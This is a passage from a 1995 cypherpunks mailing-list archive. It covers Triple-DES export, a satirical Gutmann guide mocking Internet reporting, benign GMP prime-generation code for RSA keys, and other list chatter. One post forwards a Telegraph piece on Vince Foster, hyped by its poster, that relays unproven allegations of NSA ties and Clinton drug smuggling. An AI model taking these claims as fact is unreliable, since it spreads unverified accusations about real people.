to be held during the Waco Inferno.  "This Week in Bible Prophecy" and CNN
were the only electronic media represented.  Waco encouraged discussion by
the participants for electronic tracking of cult members.

The book hits all the high points of privacy invading technology.  But has
nothing about our sorts of privacy techniques presumably because we are not
yet well known in the Christian community.  

Chapters:

1.  Boy, Have I Got Your Number
2.  Kiss Your Cash Goodby
3.  What's in the Cards?
4.  Your Body:  The Only ID You'll Ever Need
5.  Will That Be Hand or Forehead?
6.  If You're Not Paranoid, It's Because You're Not Paying Close Enough
Attention
7.  Bringing the World On-Line
8.  666:  The System Is Born
9.  The Chosen Generation
10. Where Will You Stand?

I have generally found "Fundies" to be better informed about privacy
problems and more protective of their own privacy than any other discrete group.

DCF

"60 million job changes per year + Federal Job Licensing (The Jordan
Commission proposal to require employers to verify SS#'s) + the 25% error
rate in the SS#-Name database = 15 million legally unemployable for a total
unemployment rate of 18%."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 8 Aug 95 07:42:59 PDT
To: rsalz@osf.org (Rich Salz)
Subject: Re: Triple-DES controlled?
In-Reply-To: <9508080402.AA02918@sulphur.osf.org>
Message-ID: <199508081423.KAA27453@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Didn't the ANSI financial committee just adopt 3DES (over NSA
| objections)?  Presumably they consider the export situation solved/solvable.
| 	/r$

As Perry points out, they consider it solved, albeit to the detriment
of the US infosec industry.  One would hope those companies are
complaining loudly to their congressmen.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Tue, 8 Aug 95 07:55:58 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Triple-DES controlled?
In-Reply-To: <199508081423.KAA27453@bwh.harvard.edu>
Message-ID: <199508081455.KAA00442@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 
> | Didn't the ANSI financial committee just adopt 3DES (over NSA
> | objections)?  Presumably they consider the export situation solved/solvable




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 8 Aug 95 08:37:19 PDT
To: Rich Salz <cypherpunks@toad.com
Subject: Re: Triple-DES controlled?
In-Reply-To: <9508080402.AA02918@sulphur.osf.org>
Message-ID: <9508081531.AA20316@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>>I have not heard of export licenses being granted for 3DES.

>Didn't the ANSI financial committee just adopt 3DES (over NSA
>objections)?  Presumably they consider the export situation solved/solvable.

There is absolutely no difficulty obtaining cryptographic apparatus outside the 
US. I had an entire distribution of PEM and X500 that was entirely written 
outside the US.

DES is available from many sources, there are many triple DES products 
available.

It is not impossible to get export licenses, there have been several issued for 
DES for financial applications.

If the US wants to be cut out of the market for financial services software 
that's up to them. Non US citizens can write crypto code as well, the British 
crypto tradition is far longer than the US one for example.

	Phill








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 8 Aug 95 11:43:35 PDT
To: cypherpunks@toad.com
Subject: internet reporter's guide
Message-ID: <199508081841.LAA19302@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


a charming tongue-in-cheek "reporter's guide to the internet". 
pass along to your favorite clueless reporter writing
about the information superduperhighway. don't recall seeing
it posted here, but was written by a past cypherpunk contributor...
Gutmann is also acknowledged by PRZ as putting in major amounts
of work into PGP..


------- Forwarded Message

From: pgut01@cs.auckland.ac.nz (Peter Gutmann)
Newsgroups: alt.censorship,alt.internet.media-coverage,comp.org.eff.talk
Subject: The Internet: A short guide for reporters and journalists
Date: 6 Aug 1995 12:32:53 GMT




[The following was originally posted to the nz.general newsgroup in mid-June.
 Two papers/magazines expressed vague interest in publishing it, but I haven't
 heard from them since, for reasons which may become obvious when you read
 this.  If anyone wants to publish this anywhere (Time Magazine, for example
 :-), feel free to do so.  One NZ-specific thing you may need to know is that
 Trevor "I don't give a shit about your network" Rogers is our version of
 Senator Exon who predates Exon by about 6 months and is considerably more
 clueless (and foul-mouthed) than Exon.  You can find some of his more
 notorious quotes in the EFF quote collection]
 
 
                               THE INTERNET
 
                 A short guide for reporters and journalists
 
Recently there have been a lot of reports about a generally insignificant
aspect of the Internet, namely the availability of erotica and other
information via computer.  The reason for this is quite obvious - this is one
of the hottest news topics currently available.  People get upset, tempers
fray, and Trevor Rogers gets to have his face in the paper again.  In short,
stories about the evil Internet are "in".
 
This document is intended as a guide for those who would like to join the ranks
of the other reporters and journalists who have been so successful in the past
when reporting about the Internet.  It is intended to save you the hassle of
having to reinvent the wheel when you prepare your report, and to familiarise
you with certain conventions which need to be followed when reporting on
anything to do with the net.  You'll be amazed at how simple it is.
 
 
WHY REPORTING ABOUT THE INTERNET IS USEFUL
 
The Internet provides fascinating subject material for reporters.  There's no
need to perform any research, you get to cover a "hot topic", and the message
is so simple that even politicians can understand it (or at least know how to
make political gain from it).
 
- THE MESSAGE
 
  All successful stories on the Internet are based on the following fact:
 
    The Internet is a piece of high-technology whose single goal is to get porn
    and bomb recipes into the hands of children.
 
  Don't worry about the details.  As will shortly be shown, you may have to
  adapt this message slightly for your target audience.  However, since your
  average reader won't really know the difference between the Internet, a
  dialup BBS, and a standalone computer, you don't need to go to any special
  effort to distinguish between these very different technologies.  Generalise.
  If something applies to one area, it applies to all areas, whether that's
  physically possible or not.  The message is the same, and provided people
  read/watch/listen to it, you know you've done your job.
 
- PORN
 
  Even while you were still at journalism school, you learned that sex sells.
  You also know that sex itself doesn't sell, but stories about "consumers" of
  sexual material do.  This also provides you with an excuse to show pictures
  of naked women (purely to document what's available, of course) and yet still
  hold the moral high ground.
 
  The Internet, like all communications networks, was designed solely to
  communicate pornographic images.  Of course, the average user has absolutely
  no idea how to do this, or how to perform the complex decoding and image
  manipulation necessary to view these images.  As a reporter, it is your duty
  to inform the public on how this is done.  Our moral guardians will be
  appalled at how easily you can get access to the information, anyone with a
  computer will be busy trying to duplicate your feat, and everyone else will
  be too busy staring at the pictures to do anything else.
 
  Make porn the main theme of your story.  If you're doing a story on the
  Usenet, pick something with the name "sex" in it (even if it's a sexual abuse
  counselling service - if it has "sex" in the name it's got to be bad), and
  concentrate exclusively on that.  Ignore the fact that there are over 11,000
  other interest areas available on the Usenet.  Don't even waste your time
  with them - all people ever talk about there is books, films, art, hobbies,
  cars, health, politics, financial issues, current events, religion,
  literature, and so on.  Who on earth would read a story about that?
  Concentrate only on the stuff which pulls in the readers/viewers.
  Concentrate on porn.
 
- HIGH TECH
 
  Virtually any journalist will know that the majority of the population are
  somewhat technophobic.  If you want to hold the reader's attention, you can't
  go wrong when you use this fact to your advantage.  Let's take a simple
  example:
 
    An American, a Japanese, and a New Zealander have a new technology
    explained to them.  The American says "Great, we can use this to hold the
    evil Commies in check.  I wonder if we can use it as a special effect in
    the latest Schwarzenegger film?".  The Japanese says "Interesting.  We can
    make a killing from this.  I wonder how we can make it smaller and easier
    to use".  The New Zealander says "Appalling.  This will destroy
    civilization.  How can we ban it?".
 
  As a journalist, all you need to do is follow this basic premise - that all
  new technology is evil and dangerous - and you just can't go wrong.  To
  support your claims, pick a group of self-proclaimed experts and consult them
  frequently.  The right educational counsellors ("Only natural wooden toys
  will stop your child becoming an axe murderer"), the right psychologists
  ("The constant contact with technology leads to an inner loneliness.
  Therefore the current generation's lack of communications skills is solely due
  to the invention of the telephone"), and law enforcement people ("We have no
  idea who did it, or why, or how, or when, but we do know that they got the
  information off the Internet").  Remember that *you* don't actually need to
  understand what it is you're reporting, because most of your audience won't
  either.  As long as they buy the paper or watch the program, you'll know
  you've done your job.
 
  The most important point, however, is that, due to the thorough work of your
  colleagues, the reader/viewer already has certain expectations for any story
  about the net.  Whenever they hear the word "Internet", they immediately know
  what the coverage will be on: the dangers of computers, porn, pedophiles, and
  bomb recipes.  Even if they remember nothing else, the viewers will know that
  porn was involved.  Whenever any story about the internet is published or
  broadcast, the viewers will automatically expect it to be about porn, which
  makes your job so much easier.
 
 
HOW TO DO A REPORT ON THE NET, ARRANGED BY TARGET AUDIENCE
 
Journalists are like fishermen, they select the appropriate bait depending on
the intended prey.  Although the usual collection of porn, pedophiles, and
other paraphernalia without which no report on the net can be complete provide
a wide foundation for virtually any kind of story you care to dream up, you can
give your report that final polish by specifically targeting a particular
group.  For example:
 
If you're writing for a right-wing audience:
 
  Your readers/viewers will dislike the net anyway - just look at the people
  using it, these long-haired hippie weirdos, dole bludgers and students,
  should all go out and get a real job or something.  You don't really need to
  cover this area too deeply.  The best way to get your audience hooked is to
  tell them about the horrible perversions they can run into on the net.  Just
  think, the person you're exchanging mail with could actually be a *screaming
  bender*, and you wouldn't even know about it!  There are actually areas of
  the net where gay people can meet, and talk.  Your audience *must* be
  informed of this dangerous technology.  Your message is therefore:
 
    The Internet is a piece of high-technology whose single goal is to allow
    perverted gays and lesbians to get to your children.
 
  Once your readers realise that it's possible for gays and lesbians to use the
  net just like everyone else, and that they can talk about virtually anything
  (my God, I mean, *anything*) then you know your article has been a success.
 
 
If you're writing for a left-wing audience:
 
  As with a right-wing audience, you have an advantage here that your left-wing
  readers/viewers will be suspicious of the net because the government is
  involved with it.  The internet is simply a bridgehead for a nationwide
  police database, identity cards, and the spectre of Big Brother.  Although it
  can be hard to introduce the usual morals panic into a story on general
  technophobia, we're sure you can do it.  Your general message is therefore:
 
    The Internet is a piece of high-technology whose single goal is to allow
    the government to set up a Big Brother-like nationwide computerised
    monitoring system
 
 
If you're writing for a radical feminist audience:
 
  This, along with the nation's moral guardians, is your ideal target audience.
  The internet is run mostly by men and in the past has been used mostly by
  men.  The mere existence of the evil internet is therefore solely the fault
  of all males.  Your message is therefore:
 
    The Internet is a piece of high-technology whose single goal is to allow
    the emotionally crippled male gender to communicate pictures of their
    female victims and therefore increase the incidence of sexual abuse and
    rape.
 
  Remember that certain ideologies of the radical feminist movement have to be
  brought up in each story.  These are:
 
  - The goal of all male-dominated technology is the oppression of womyn.  All
    technology, even if it's not obvious how, is created to oppress womyn.
  - Pornography is the theory, rape is the practice.  Any man who sees even a
    glimpse of bare flesh is instantly converted into a rapist.
  - Womyn never look at any porn, not even at pictures of naked men, and never
    produce porn for other women to consume.  Every counterexample to this
    claim is either invented or the product of male brainwashing.
 
  Try and find a number of womyn to support your views.  Interview lots of
  sexual abuse victims, even if there's no connection whatsoever to the
  Internet, because graphic abuse stories are a great way to arouse sympathy
  for your cause, as has been ably demonstrated in US Senate hearings.  If you
  ever even show a man as part of your story, find some pimply, greasy-haired,
  low-IQ type whose most intelligent comment is a Beavis-and-Butthead-like "Huh
  huh huh".
 
 
If you're writing for the "moral majority":
 
  This is the perfect target audience.  Your viewers/readers will be
  conservative, right-wing, and won't understand the technological and social
  issues involved.  Tell them anything.  Since you control the media, no one
  will ever correct you (except perhaps a few long-haired hippies calling
  talkback shows, but who listens to talkback anyway?).  If a 15-year-old runs
  away from home, they've been kidnapped by an internet pedophile ring.  Every
  time you turn on your computer, snuff movies appear on the screen.  A shadowy
  gang of spies is hiding US nuclear weapons secrets inside dirty pictures and
  sending them to the middle east.  There are more pedophiles on the net in the
  US than the population of some countries.  The middle east has an appalling
  pedophiles-on-the-net problem, even though there is no Internet in the middle
  east.  All these stories, and more, have already been run by your colleagues
  in and outside the country, or have been reported by politicians.  If people
  will swallow this, they'll swallow anything.  Although you have a pretty much
  blank slate on which to vent your creativity, extensive research has shown
  that you get the best results if you make your message more or less:
 
    The Internet is a piece of high-technology whose single goal is to allow
    every imaginable form of depravity and filth into every home in New
    Zealand.
 
 
WARNINGS
 
As with any story, there are a few traps you have to be careful to avoid.
 
- Never let the reader know what else is available on the net.  You make your
  living from the fact that you feed information to people.  If these people
  find out that they can get the same information faster, easier, and much more
  cheaply, off the net, you'll lose your monopoly, and, sooner or later, your
  job.  By manipulating your reader's emotions (shock, disbelief, loathing),
  you can make sure that few people will ever see the full richness of the
  information available on the net, and ensure that they keep coming to you for
  information.
 
- Never mention the fact that virtually everybody who is anybody is on the net.
  If people find out that things like Time Magazine, MTV, the New York Stock
  Exchange, and Winona Ryder are all directly accessible via the net, their
  image of the internet will be shattered.
 
- Never mention the fact that there are no commercials and no censorship on the
  net.  Your sponsors are hard at work turning people's TV watching and
  newspaper reading into an almost continuous stream of commercials.  If people
  found out that they can sit on the internet for 15 hours at a time without
  seeing a single ad for women's sanitary products, your TV station (and
  therefore your job) is in trouble.
 
 
IRRELEVANT TOPICS
 
There are certain topics you should never touch on in your reporting.  These
are:
 
- Technology.  No one cares about this.  Your audience doesn't want to know
  about the technology, otherwise they'd have to actually think about the
  issues involved.  And anyway, when did you become an engineer or sociologist?
  The best reports on the internet are filed by reporters who refuse to even
  use a computer and have no idea what the internet is, since they're the ones
  least likely to be hampered by any facts.
 
- Education.  Never mention the fact that studies have shown that
  children who use the internet spend less time in front of the TV, do better
  at school, have better writing skills, and are much more likely to get a job
  in the future.  Scare them away from the internet.  We've got a welfare
  state, they'll be looked after in some way.  Besides, you'll be able to do
  more stories on future street kids that way.
 
- - Useful applications of the internet.  If you find out that the President of
  the United States is on the internet, don't even think about suggesting the
  Prime Minister does the same.  Politics and computers just don't mix, as has
  been shown repeatedly by one ex-National Party politician.  Even if the
  President talks to his staff via email, and they all run around with laptops,
  that's just an American fad.  New Zealanders don't need that sort of thing.
 
- - Other media.  Always call it "the Internet", whether what you're reporting on
  occurred on the internet, a private network, a standalone computer, or in
  your imagination.  If necessary, edit the pictures you show to support your
  story.  When people hear a computer horror story, they expect it to be about
  the internet, not based on something you saw last night on X-Files.
 
 
FOR YOUR SAFETY
 
As a reporter, you've become accustomed to having your say while everyone else
listens.  On the internet, this is very different.  When one of your
masterpieces of creative reporting is published or broadcast, a potential
audience of thirty million people will pick it to pieces.  With a single story,
you can alienate fifty, a hundred thousand members of your audience in one
stroke.  Never use the internet yourself, or publish any form of email address.
You're not paid to handle feedback, only to write stories.  Heavens, if you
listened to people correcting your story, you might actually have to report the
truth!
 
Therefore, write whatever you want, but never give your readers a chance to
reply.  By the time NZ Post has finally delivered their mail to you, you'll
already be halfway through your next report on baby-eating pedophiles on the
net, and can safely ignore any feedback from the previous one.
 
 
A LAST PLEA TO JOURNALISTS
 
Horror stories about the internet have already helped hundreds of your
colleagues through dry spells in the flow of news.  Make sure you preserve this
valuable resource for future generations of journalists.  Don't report more
than you need to.  A short, zero-content missive in which you mention the word
"pedophiles" in every second sentence is fine, as has been ably demonstrated by
Trevor Rogers.  The internet is a wonderful source of stories for any
journalist or reporter who has a deadline in a few hours and nothing else they
can report on.  You can report virtually anything without needing to do any
research or acquire any background information.  Therefore the *real* purpose
of the internet can finally be revealed:
 
    The Internet is a piece of high-technology whose single goal is to allow
    reporters, at the expense of the truth, to grab the headlines for a day or
    two with an absolutely minimal investment in time and effort.
 
We hope to have made your job as a reporter easier through this simple guide.
Good luck, and remember, as long as you use the magic words "pedophile",
"porn", and "protecting the children" as often as possible, you can get away
with anything.
 
                                    --------
 
Written 15/6/95 Peter Gutmann, from an original by Scot Stevenson.


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Tue, 8 Aug 95 09:07:44 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Prime Number Gen's.
Message-ID: <Pine.SUN.3.91.950808120640.17355D-100000@frog.zoo2.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of where I could get source, royalty free, in the US for 
a good Prime Number Generator?

One that used a set of quick probabilistic algorithms would be cool.

Thanks
Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 8 Aug 95 12:24:32 PDT
To: cypherpunks@toad.com
Subject: *hot* Foster news
Message-ID: <199508081922.MAA20209@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



various "conspiracy theories" have been circulating connecting
Foster to the NSA, although there doesn't seem to be any 
substantial, verifiable connections-- UNTIL NOW. below
the amazing british reporter Evans-Pritchard, who has 
broken much of the Foster information, states that 
Deborah Gorham, Foster's executive assistant, gave 
testimony that  he was handling NSA documents near
the time of death!!! (Evans-Pritchard was quoted a few
weeks ago of being "skeptical" of the more extreme
Foster-NSA theories, although he has pointed out the
many inconsistencies associated with the Foster
"suicide"...)

this Foster thing continues to gain steam.. apparently
Newt Gingrich has hired an independent investigator...

frankly, I think we are seeing the beginning of the
end of the Clinton administration... or perhaps even
the Presidency as we know it...

BTW, a hot Foster URL with all the extreme theories/releases is

http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html

the most amazing stuff on this page claims some publishers
were attempted to be *bribed* in not releasing Foster info/stories..


------- Forwarded Message

Date: Mon, 07 Aug 95 03:04:34 0600
Subject: Ambrose throws scat in the oscillator

http://www.telegraph.co.uk/et/access?ac=111146825878&pg=//95/8/7/wambro07.html


Secret service link in death of Clinton aide

By Ambrose Evans-Pritchard in Washington

VINCE Foster was handling top-secret intelligence files at the White 
House before his violent death
in July 1993, according to sworn testimony given to the Senate Banking 
Committee.

Deborah Gorham, Foster's executive assistant, gave a dramatic new twist 
to the widening
Whitewater investigation into the financial affairs of Hillary and Bill 
Clinton. Gorham told Senate
lawyers that Foster, Deputy White House Counsel and an intimate friend 
of the Clintons, stored
documents from the National Security Agency in a safe next door in the 
office of his boss. 

The Telegraph has obtained a full copy of Gorham's deposition, which was
taken behind closed doors on June 26 and has never been released to the
press.

She testified that Foster handed her the files for safe storage in March 
or April of 1993. Asked
what the documents looked like, she replied: "There were two one-inch 
ring binders that were from
the National Security Agency."

She referred to the NSA files with precision three times in her 
testimony. The Senate investigators,
however, did not seem interested in this surprising disclosure and moved 
on quickly to other
matters. When Gorham appeared as a witness in televised hearings last 
Tuesday, the subject never
came up.

The National Security Agency is a legendary arm of US intelligence. It 
is controlled by the Defence
Department and has a far larger budget than the CIA. Its chief function 
is to collect intelligence
from satellites and by eavesdropping on telephones and computer traffic 
all over the world.

Foster's job as Deputy White House Counsel was to handle legal matters 
concerning the institution
of the presidency. While his office might handle classified documents 
from the FBI or other law
enforcement agencies from time to time, it would be highly unusual for 
him to get mixed up in the
foreign espionage activities of the ultra-secret NSA.

Gorham said that these two files were the only ones Foster ever handed 
to her for storage in the
safe. She also testified, however, that Foster kept a file on the Waco 
disaster locked in a cabinet in
his office, which may belie White House claims that Foster never played 
a significant role in the
storming of the Branch Davidian stronghold by the FBI.

There is no proof that Foster ever had any dealings with the NSA, or any 
other branch of US
intelligence. But allegations have been flying on the Internet computer 
superhighway and in
political newsletters on both the Left and the Right over the past few 
weeks claiming that he was an
NSA operative during the 1980s. It is alleged that he took care of legal 
matters for a computer
company in Arkansas that installed "bugged" software on behalf of US 
intelligence in commercial
and central banks all over the world.

At the time, Foster was head of litigation at the Rose Law Firm in 
Little Rock, Arkansas. It has
never been established that he did, in fact, do work for this computer 
company. But his partner,
Hillary Rodham Clinton, was the attorney of record on two known 
occasions, once in 1978 and
then again in April 1986 (during the term of Bill Clinton's 
Governorship) when a federal court
clerk inadvertently revealed her role in a case by releasing details of 
a sealed law suit.

The staff of the Independent Counsel investigating Whitewater has been 
asking some questions
about this subterranean software nexus after receiving a letter from 
Elliot Richardson, the former
US Attorney-General. Richardson, who has followed the affair closely, 
has suggested that it might
be linked in some way to the death of Foster. Jim Leach, the Chairman of 
the House Banking
Committee, has also been looking into the computer mysteries in 
preparation for his own
congressional hearings into Whitewater, this week.

In a parallel development, The Telegraph has learned that the House 
Judiciary Committee is
beginning to prepare for possible hearings into gun-running and 
drug-smuggling in Arkansas.
Terry Reed, a former Air Force intelligence operative, has been asked if 
he is willing to testify
about his experiences in a covert operation based at the Mena airport in 
the mid-1980s.

After watching the charade of Republican hearings into Waco and 
Whitewater over the past three
weeks, Reed has mixed feelings about this prospect. "I want to know 
whether they're for real this
time, or whether it's just another of their political pillow fights," he 
said.

He is the plaintiff in a civil-rights suit that is cracking open the 
great Arkansas scandal quite
effectively through the power of legal "discovery". Last month, he took 
sworn testimony from a
secretary at the Criminal Intelligence Division of the Arkansas State 
Police who said that she helped
shred sensitive documents revealing the involvement of Bill Clinton's 
Arkansas in the Contra
support operation run by Lt Col Oliver North.

In another deposition, L. D. Brown, the Arkansas State Trooper, has now 
repeated under oath the
allegations published in the August edition of the American Spectator 
magazine. He said he was
recruited by the CIA in 1984 - with the encouragement of Governor 
Clinton - and flew on two
missions to Central America to deliver M-16 rifles to the Nicaraguan 
Contras.

On one of the return trips, he discovered the aircraft was carrying 
cocaine into Arkansas. He
confronted Clinton, but was told not to worry. "That's Lasater's deal," 
said the Governor,
referring to Dan Lasater, a business tycoon and political supporter who 
was later convicted on
federal cocaine charges.

Over dinner at the Cosmos Club in Washington last week, Trooper Brown 
said that his old friend
Bill Clinton was complicit in a major drug-smuggling operation. That, he 
said, is something that
cannot be forgiven.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 8 Aug 95 12:32:30 PDT
To: cypherpunks@toad.com
Subject: Slouka's "War of the Worlds" (trashing of computers)
Message-ID: <ac4d08ee08021004d983@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:53 PM 8/8/95, John Young wrote:
>   8-8-95. NYPaper:
>
>
>   "War of the Worlds: Cyberspace and the High-Tech Assault on
>   Reality." [Book review]
>
>      Ominous signs already exist, says the scholar Mark
>      Slouka that virtual reality has begun to replace real
>      life -- or "R.L.," as it is dismissively referred to by
>      computer freaks. Even those poor benighted folks who
>      have yet to enter the computer age appear to have
>      started down "the road to unreality," says Mr. Slouka:
>      PONA's (or "persons of no account," as they're known on

[rest elided]

I found this book several days ago in a local bookstore and sat down on the
floor to read (most of) it. It's one of those thin, 130-page-or-so books,
about the length of what many of us can write in a few days. (I'm not
claiming our stuff is as publishable, just that the publishing industry
seems to love being able to charge $25 for a hardback book of 30,000 words!
The imminent death of conventional publishing predicted!)

Yet more bashing of computers. I found nothing insightful in this book,
just a personal account of the author's struggle to understand why so many
of his friends are using computers so much.

Bashing the cybernetic aspects of our culture is hot these days. I expect
Oprah and Sally Jesse to soon be doing shows on this. Children whose
mothers are Net addicts, brothers who kill their sisters for using "vi,"
and jilted cyberlovers who are in relationships with their shrinkwraps.

--Tim May


Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Tue, 8 Aug 95 10:35:49 PDT
To: "Rev. Ben" <samman@cs.yale.edu>
Subject: Re: Prime Number Gen's.
In-Reply-To: <Pine.SUN.3.91.950808120640.17355D-100000@frog.zoo2.cs.yale.edu>
Message-ID: <199508081735.NAA27772@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



"Rev. Ben" writes:
> Does anyone know of where I could get source, royalty free, in the US for 
> a good Prime Number Generator?

PGP?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 8 Aug 95 10:55:49 PDT
To: cypherpunks@toad.com
Subject: Re: proving programs correct
In-Reply-To: <199508081248.IAA11447@panix2.panix.com>
Message-ID: <9508081749.AA20619@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>A boss of mine at Bellcore, and a very smart guy (B. Gopinath) once
>mentioned to me that (with the exception of scheme) he'd never seen a
>set of formal semantics for a language that were smaller than the
>largest program one would care to write in the language.


I suggest he look at occam, the semantics are very compact, about ten pages.

The purpose of writing the denotational semantics is to obtain a grounding for 
the axiomatic semantics which may then be used for proofs.

All this means is that languages such as ADA are useless for formal methods work 
because the language is too big to develop a useful semantics for it. C is 
better but still far too large and the semantic ambiguities of the language 
cause problems.

I don't consider the conventional application of formal methods to be a 
practical approach. This does not mean that no such approaches exist, merely 
that people use the wrong ones.


		Phill H-B



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 8 Aug 95 11:29:43 PDT
To: cypherpunks@toad.com
Subject: alt.politics.org.cia
Message-ID: <9508081825.AA11385@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I picked up a posting there which I forwarded to another list (skipping this
slightly overloaded one :-) but it was cute/funny -- suggesting a project
for finding unmarked spook buildings in your neighborhood and gathering
a database (on the web?) of such.

It's not a CP topic, but it's related and folks might want to check out
that newsgroup.  (Thanks to r$ for the inspiration.)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 8 Aug 95 11:53:52 PDT
To: cypherpunks@toad.com
Subject: PTM_kin
Message-ID: <199508081853.OAA17131@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-8-95. NYPaper:


   "War of the Worlds: Cyberspace and the High-Tech Assault on
   Reality." [Book review]

      Ominous signs already exist, says the scholar Mark
      Slouka that virtual reality has begun to replace real
      life -- or "R.L.," as it is dismissively referred to by
      computer freaks. Even those poor benighted folks who
      have yet to enter the computer age appear to have
      started down "the road to unreality," says Mr. Slouka:
      PONA's (or "persons of no account," as they're known on
      line) can be found in front of their television sets,
      watching fictionalized accounts of real-life events, or
      at ballgames, listening to radio broadcasts of the very
      game being played before their eyes. As Mr. Slouka puts
      it, more and more of us "accept the copy as the
      original," a development that is sure to accelerate in
      coming years with lasting social, cultural and political
      effects. Mr. Slouka foresees a sinister new world in
      which telecommunications replaces physical contact and
      meaningless abstractions replace a sense of community
      and place: a solipsistic world turned in on itself and
      easily subject to manipulation by politicians.


   PTM_kin


   [Mark Slouka, John Perry Barlow, Kevin Kelly and Sven
   Birkerts beavis-butt and wayne-garth about cyber-duh in the
   August Harper's.]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 8 Aug 95 15:51:30 PDT
To: cypherpunks@toad.com
Subject: Judge Ito says NSA won't help!
Message-ID: <ac4d39270e0210042df7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



While watching the coverage of the OJ circus, I just heard Judge Ito say
about a tape that has been recorded over a couple of times:

"I doubt that it's recoverable, except by the NSA, and I doubt they're
going to help us."

I saw the lawyers smile, so they caught the reference.

Anybody who thinks the NSA remains obscure isn't watching enough t.v.!

--Tim May

Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 8 Aug 95 10:12:08 PDT
To: samman@cs.yale.edu ("Rev. Ben")
Subject: Prime Number Gen's.
Message-ID: <15295.9508081711@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



"Rev. Ben" <samman@cs.yale.edu> writes on cpunks:
> Does anyone know of where I could get source, royalty free, in the US for 
> a good Prime Number Generator?

GNU code sounds like it would fit the royalty free bill.

Try the GNU multi-precision library: gmp-1.3.2.tar.gz from all good
GNU sources.  I get my stuff from ftp://src.doc.ic.ac.uk/gnu/ if you
don't have a GNU ftp site to hand.

There's a function

	int mpz_probab_prime_p(mpnum, SURETY)

which returns true if the prime passes SURETY probabilistic prime tests.

I think if it passes say 25 tests, then there will be less than a
1/2^25 chance that it is not prime.

Also, on:

	http://dcs.ex.ac.uk/~aba/rsa-keygen.html

I've got some code Aggelos Keromitis <kermit@forthnet.gr> wrote using
the GNU mp library for generating RSA keys, it uses the probab_prime
function, like this:

        while (!mpz_probab_prime_p(&p, 25))     /* Find a prime */
          mpz_add_ui(&p, &p, 1);

Where p is a random starting point.  Ie just add one and repeat.  It
would be faster to check for some more obvious things like even nos,
etc.  But it seems to work well enough, and generates working RSA
keys.

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
